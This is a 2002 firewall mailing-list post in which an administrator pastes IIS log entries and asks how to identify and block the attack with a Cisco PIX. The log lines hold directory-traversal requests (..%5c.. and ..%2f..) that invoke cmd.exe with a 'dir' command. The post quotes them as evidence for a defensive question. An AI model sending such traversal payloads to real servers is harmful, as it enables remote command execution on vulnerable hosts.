Last week I checked our IIS web server's log file and found the following attack logs. I am using a Cisco PIX and opened port 80 for our web server. Could anyone tell me what kind of attack these are and how to block them out of my network by PIX?
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent) 2002-03-29 01:39:24 24.157.182.174 - 24.157.93.95 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2002-03-29 01:39:24 24.157.182.174 - 24.157.93.95 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2002-03-29 01:39:24 24.157.182.174 - 24.157.93.95 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500 - 2002-03-29 01:39:24 24.157.182.174 - 24.157.93.95 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500 - Thansk, Fei. _______________________________________________ Firewalls mailing list [EMAIL PROTECTED] http://lists.gnac.net/mailman/listinfo/firewalls
